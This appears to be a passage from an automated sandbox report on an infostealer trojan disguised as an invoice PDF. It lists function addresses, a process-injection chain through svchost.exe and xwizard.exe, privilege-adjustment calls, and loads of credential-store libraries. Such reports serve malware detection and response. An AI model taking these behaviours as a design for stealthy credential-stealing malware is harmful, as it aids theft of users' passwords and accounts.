                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FC05915_2_04FC0591
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F005355_2_04F00535
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1C6E05_2_04F1C6E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EFC7C05_2_04EFC7C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F007705_2_04F00770
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F247505_2_04F24750
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F920005_2_04F92000
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB81CC5_2_04FB81CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FC01AA5_2_04FC01AA
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F881585_2_04F88158
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F9A1185_2_04F9A118
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EF01005_2_04EF0100
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F802C05_2_04F802C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FA02745_2_04FA0274
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0E3F05_2_04F0E3F0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FC03E65_2_04FC03E6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBA3525_2_04FBA352
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EF0CF25_2_04EF0CF2
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FA0CB55_2_04FA0CB5
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F00C005_2_04F00C00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EFADE05_2_04EFADE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F18DBF5_2_04F18DBF
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F9CD1F5_2_04F9CD1F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0AD005_2_04F0AD00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBEEDB5_2_04FBEEDB
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F12E905_2_04F12E90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBCE935_2_04FBCE93
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F00E595_2_04F00E59
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBEE265_2_04FBEE26
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0CFE05_2_04F0CFE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EF2FC85_2_04EF2FC8
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F7EFA05_2_04F7EFA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F74F405_2_04F74F40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F20F305_2_04F20F30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F42F285_2_04F42F28
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F2E8F05_2_04F2E8F0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EE68B85_2_04EE68B8
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0A8405_2_04F0A840
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F028405_2_04F02840
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F029A05_2_04F029A0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FCA9A65_2_04FCA9A6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F169625_2_04F16962
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EFEA805_2_04EFEA80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB6BD75_2_04FB6BD7
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBAB405_2_04FBAB40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EF14605_2_04EF1460
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBF43F5_2_04FBF43F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F9D5B05_2_04F9D5B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB75715_2_04FB7571
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB16CC5_2_04FB16CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBF7B05_2_04FBF7B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB70E95_2_04FB70E9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBF0E05_2_04FBF0E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F070C05_2_04F070C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FAF0CC5_2_04FAF0CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0B1B05_2_04F0B1B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FCB16B5_2_04FCB16B
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EEF1725_2_04EEF172
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F3516C5_2_04F3516C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FA12ED5_2_04FA12ED
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1B2C05_2_04F1B2C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F052A05_2_04F052A0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F4739A5_2_04F4739A
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EED34C5_2_04EED34C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB132D5_2_04FB132D
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFCF25_2_04FBFCF2
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F79C325_2_04F79C32
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1FDC05_2_04F1FDC0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB7D735_2_04FB7D73
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB1D5A5_2_04FB1D5A
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F03D405_2_04F03D40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F09EB05_2_04F09EB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFFB15_2_04FBFFB1
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F01F925_2_04F01F92
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFF095_2_04FBFF09
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F038E05_2_04F038E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F6D8005_2_04F6D800
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F099505_2_04F09950
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1B9505_2_04F1B950
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F959105_2_04F95910
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FADAC65_2_04FADAC6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F45AA05_2_04F45AA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F9DAAC5_2_04F9DAAC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F73A6C5_2_04F73A6C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFA495_2_04FBFA49
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB7A465_2_04FB7A46
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F75BF05_2_04F75BF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F3DBF95_2_04F3DBF9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1FB805_2_04F1FB80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFB765_2_04FBFB76
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030120005_2_03012000
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0300D1605_2_0300D160
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0300B1E05_2_0300B1E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030156505_2_03015650
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0302BB705_2_0302BB70
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0301389B5_2_0301389B
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030138A05_2_030138A0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0300CF405_2_0300CF40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBE6CC5_2_04DBE6CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBD7985_2_04DBD798
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBE2145_2_04DBE214
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBE3335_2_04DBE333
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBCA445_2_04DBCA44
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 00445975 appears 65 times
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 0041171A appears 37 times
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 0041718C appears 45 times
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 0040E6D0 appears 35 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04EEB970 appears 275 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F7F290 appears 105 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F35130 appears 58 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F47E54 appears 101 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.000000000419D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039190730.0000000003FF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/11
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\aut285A.tmpJump to behavior
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003291000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.00000000032BE000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2528743375.0000000003270000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.000000000329A000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2528865334.0000000003291000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeFile read: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
                Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"Jump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000000.2274863523.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeStatic PE information: real checksum: 0xa2135 should be: 0xf442e
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0049004C push edi; retf 0_2_0049004D
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401815 push ss; ret 2_2_004018B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F036 push edi; retf 2_2_0041F03A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418096 push cs; retf 2_2_00418097
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412995 push es; retf 2_2_00412997
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412A79 push ds; ret 2_2_00412A7A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004014C0 push ss; retn 6DEBh2_2_00401542
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004014C0 push ss; ret 2_2_004018B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041850B push edi; ret 2_2_00418528
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041ADCE push ds; retf 2_2_0041AE1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035E0 push eax; ret 2_2_004035E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041ADE3 push ds; retf 2_2_0041AE1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D679 push eax; retf 2_2_0040D67A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402613 push ecx; retf 2_2_0040261E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413E89 push BD1E4A2Bh; ret 2_2_00413E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419739 push ss; iretd 2_2_0041973C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411FA1 push 79675D9Eh; retf 2_2_00411FA7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
